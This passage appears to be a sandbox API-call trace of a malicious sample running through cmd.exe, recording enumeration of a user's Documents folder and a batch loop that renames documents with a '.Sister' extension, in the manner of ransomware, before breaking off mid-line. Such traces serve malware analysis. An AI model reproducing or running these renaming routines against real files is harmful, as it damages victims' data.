FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="Outlook Files", cAlternateFileName="")) returned 1 [0305.200] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f1fa50, ftCreationTime.dwHighDateTime=0x1d58922, ftLastAccessTime.dwLowDateTime=0xbc0663d0, ftLastAccessTime.dwHighDateTime=0x1d5a708, ftLastWriteTime.dwLowDateTime=0xbc0663d0, ftLastWriteTime.dwHighDateTime=0x1d5a708, nFileSizeHigh=0x0, nFileSizeLow=0x13b92, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="OVx6NdSsuK-BG9xofKxa.docx", cAlternateFileName="")) returned 1 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.200] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x1b8) returned 0x21ed8c758a0 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.200] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x1b8 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.200] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2c600 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.200] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2c600, Size=0x30) returned 0x21ed8d2c600 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.200] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c600) returned 0x30 [0305.200] GetProcessHeap () returned 0x21ed8c70000 [0305.201] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33250 [0305.202] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bb70 [0305.202] ??_V@YAXPEAX@Z () returned 0x1 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33250, Size=0x210) returned 0x21ed8d33250 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33250) returned 0x210 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33470 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33470, Size=0x290) returned 0x21ed8d33470 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33470) returned 0x290 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33710 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33710, Size=0x30) returned 0x21ed8d33710 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33710) returned 0x30 [0305.202] GetProcessHeap () returned 0x21ed8c70000 [0305.202] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33750 [0305.202] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.203] GetProcessHeap () returned 0x21ed8c70000 [0305.203] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7c070 [0305.203] ??_V@YAXPEAX@Z () returned 0x1 [0305.203] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.203] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7c60 [0305.203] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.203] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7d20 [0305.204] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0305.204] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe0729a61, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe0729a61, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7c60 [0305.204] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0305.204] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.204] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f1fa50, ftCreationTime.dwHighDateTime=0x1d58922, ftLastAccessTime.dwLowDateTime=0xbc0663d0, ftLastAccessTime.dwHighDateTime=0x1d5a708, ftLastWriteTime.dwLowDateTime=0xbc0663d0, ftLastWriteTime.dwHighDateTime=0x1d5a708, nFileSizeHigh=0x0, nFileSizeLow=0x13b92, dwReserved0=0x4, dwReserved1=0x7, cFileName="OVx6NdSsuK-BG9xofKxa.docx", cAlternateFileName="OVX6ND~1.DOC")) returned 0x21ed8cc7180 [0305.204] FindClose (in: hFindFile=0x21ed8cc7180 | out: hFindFile=0x21ed8cc7180) returned 1 [0305.204] _wcsnicmp (_String1="OVX6ND~1.DOC", _String2="OVx6NdSsuK-BG9xofKxa.docx", _MaxCount=0x19) returned 11 [0305.205] malloc (_Size=0x1ff9c) returned 0x21eda25fd40 [0305.205] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.207] GetProcessHeap () returned 0x21ed8c70000 [0305.207] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bc60 [0305.207] ??_V@YAXPEAX@Z () returned 0x1 [0305.207] ??_V@YAXPEAX@Z () returned 0x1 [0305.207] GetProcessHeap () returned 0x21ed8c70000 [0305.207] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33750, Size=0x208) returned 0x21ed8d33750 [0305.207] GetProcessHeap () returned 0x21ed8c70000 [0305.207] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33750) returned 0x208 [0305.207] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.207] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.207] GetFileType (hFile=0x50) returned 0x2 [0305.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.207] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.208] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.208] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.215] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.215] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.215] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.215] GetFileType (hFile=0x50) returned 0x2 [0305.215] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.215] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.216] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.216] GetFileType (hFile=0x50) returned 0x2 [0305.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.216] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.217] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2c610*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2c610*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.218] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"OVx6NdSsuK-BG9xofKxa.docx\" \"OVx6NdSsuK-BG9xofKxa.docx.Sister\" ") returned 64 [0305.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.218] GetFileType (hFile=0x50) returned 0x2 [0305.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.218] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.218] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x40) returned 1 [0305.219] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.219] GetFileType (hFile=0x50) returned 0x2 [0305.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.219] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.233] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.233] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.237] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.237] GetFileType (hFile=0x50) returned 0x2 [0305.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.237] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.237] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.237] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.238] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.238] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.238] GetFileType (hFile=0x50) returned 0x2 [0305.238] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.238] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.239] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.239] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.239] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.239] GetFileType (hFile=0x50) returned 0x2 [0305.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.240] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.242] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.242] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.248] GetFileType (hFile=0x50) returned 0x2 [0305.248] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.248] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.248] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.248] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d33720*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d33720*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.249] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"OVx6NdSsuK-BG9xofKxa.docx.Sister\" \"OVx6NdSsuK-BG9xofKxa.bat\" ") returned 63 [0305.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.249] GetFileType (hFile=0x50) returned 0x2 [0305.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.249] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.249] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3f) returned 1 [0305.261] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0305.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.261] GetFileType (hFile=0x50) returned 0x2 [0305.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.261] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0305.262] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.262] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0305.267] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.268] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.268] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.268] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.268] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.268] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.270] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.270] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.270] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.270] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.270] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.270] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.271] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.271] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.271] ??_V@YAXPEAX@Z () returned 0x1 [0305.271] GetProcessHeap () returned 0x21ed8c70000 [0305.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x110) returned 0x21ed8d6aee0 [0305.271] GetProcessHeap () returned 0x21ed8c70000 [0305.271] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6aee0, Size=0x90) returned 0x21ed8d451c0 [0305.271] GetProcessHeap () returned 0x21ed8c70000 [0305.271] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d451c0) returned 0x90 [0305.272] GetProcessHeap () returned 0x21ed8c70000 [0305.272] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d44ea0 [0305.272] GetProcessHeap () returned 0x21ed8c70000 [0305.272] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x110) returned 0x21ed8d6b000 [0305.272] GetProcessHeap () returned 0x21ed8c70000 [0305.272] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b000, Size=0x90) returned 0x21ed8d449a0 [0305.272] GetProcessHeap () returned 0x21ed8c70000 [0305.273] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d449a0) returned 0x90 [0305.273] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.273] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.273] GetProcessHeap () returned 0x21ed8c70000 [0305.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7e40 [0305.273] GetProcessHeap () returned 0x21ed8c70000 [0305.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c260 [0305.273] _wcsicmp (_String1="OVx6NdSsuK-BG9xofKxa.docx", _String2=".") returned 65 [0305.273] _wcsicmp (_String1="OVx6NdSsuK-BG9xofKxa.docx", _String2="..") returned 65 [0305.273] GetFileAttributesW (lpFileName="OVx6NdSsuK-BG9xofKxa.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ovx6ndssuk-bg9xofkxa.docx")) returned 0x20 [0305.274] GetProcessHeap () returned 0x21ed8c70000 [0305.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed932ffd0 [0305.275] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed932ffe0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.275] SetErrorMode (uMode=0x0) returned 0x0 [0305.275] SetErrorMode (uMode=0x1) returned 0x0 [0305.275] GetFullPathNameW (in: lpFileName="OVx6NdSsuK-BG9xofKxa.docx", nBufferLength=0x7fe7, lpBuffer=0x21eda25fd40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx", lpFilePart=0xa6cf4fd660*="OVx6NdSsuK-BG9xofKxa.docx") returned 0x33 [0305.275] SetErrorMode (uMode=0x0) returned 0x1 [0305.275] GetProcessHeap () returned 0x21ed8c70000 [0305.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cc20 [0305.276] _wcsicmp (_String1="OVx6NdSsuK-BG9xofKxa.docx", _String2=".") returned 65 [0305.276] _wcsicmp (_String1="OVx6NdSsuK-BG9xofKxa.docx", _String2="..") returned 65 [0305.276] GetFileAttributesW (lpFileName="OVx6NdSsuK-BG9xofKxa.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ovx6ndssuk-bg9xofkxa.docx")) returned 0x20 [0305.276] ??_V@YAXPEAX@Z () returned 0x1 [0305.276] malloc (_Size=0xffce) returned 0x21eda25fd40 [0305.276] ??_V@YAXPEAX@Z () returned 0x21eda25fd40 [0305.276] malloc (_Size=0xffce) returned 0x21eda26fd20 [0305.276] ??_V@YAXPEAX@Z () returned 0x21eda26fd20 [0305.277] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ovx6ndssuk-bg9xofkxa.docx")) returned 0x20 [0305.277] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.277] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.277] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d5c270, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d5c270) returned 0x21ed8cc7f00 [0305.278] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.278] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.278] ??_V@YAXPEAX@Z () returned 0x1 [0305.278] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx" (normalized: "c:\\users\\fd1hvy\\documents\\ovx6ndssuk-bg9xofkxa.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\OVx6NdSsuK-BG9xofKxa.docx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\ovx6ndssuk-bg9xofkxa.docx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.279] FindNextFileW (in: hFindFile=0x21ed8cc7f00, lpFindFileData=0x21ed8d5c270 | out: lpFindFileData=0x21ed8d5c270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f1fa50, ftCreationTime.dwHighDateTime=0x1d58922, ftLastAccessTime.dwLowDateTime=0xbc0663d0, ftLastAccessTime.dwHighDateTime=0x1d5a708, ftLastWriteTime.dwLowDateTime=0xbc0663d0, ftLastWriteTime.dwHighDateTime=0x1d5a708, nFileSizeHigh=0x0, nFileSizeLow=0x13b92, dwReserved0=0x0, dwReserved1=0x0, cFileName="OVx6NdSsuK-BG9xofKxa.docx", cAlternateFileName="")) returned 0 [0305.280] GetLastError () returned 0x12 [0305.281] FindClose (in: hFindFile=0x21ed8cc7f00 | out: hFindFile=0x21ed8cc7f00) returned 1 [0305.281] ??_V@YAXPEAX@Z () returned 0x1 [0305.281] ??_V@YAXPEAX@Z () returned 0x1 [0305.281] ??_V@YAXPEAX@Z () returned 0x1 [0305.281] ??_V@YAXPEAX@Z () returned 0x1 [0305.281] GetProcessHeap () returned 0x21ed8c70000 [0305.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc74e0 [0305.281] GetProcessHeap () returned 0x21ed8c70000 [0305.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c957a0, Size=0x16) returned 0x21ed8c95960 [0305.281] GetProcessHeap () returned 0x21ed8c70000 [0305.281] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95960) returned 0x16 [0305.281] GetProcessHeap () returned 0x21ed8c70000 [0305.281] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x20) returned 0x21ed8d45e30 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45e30) returned 0x20 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61a80 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61a80, Size=0xb2) returned 0x21ed93b5370 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b5370) returned 0xb2 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d33970 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d33970, Size=0x30) returned 0x21ed8d33970 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d33970) returned 0x30 [0305.282] GetProcessHeap () returned 0x21ed8c70000 [0305.282] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d339b0 [0305.282] malloc (_Size=0x1ff9c) returned 0x21eda25fd40 [0305.283] GetProcessHeap () returned 0x21ed8c70000 [0305.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, 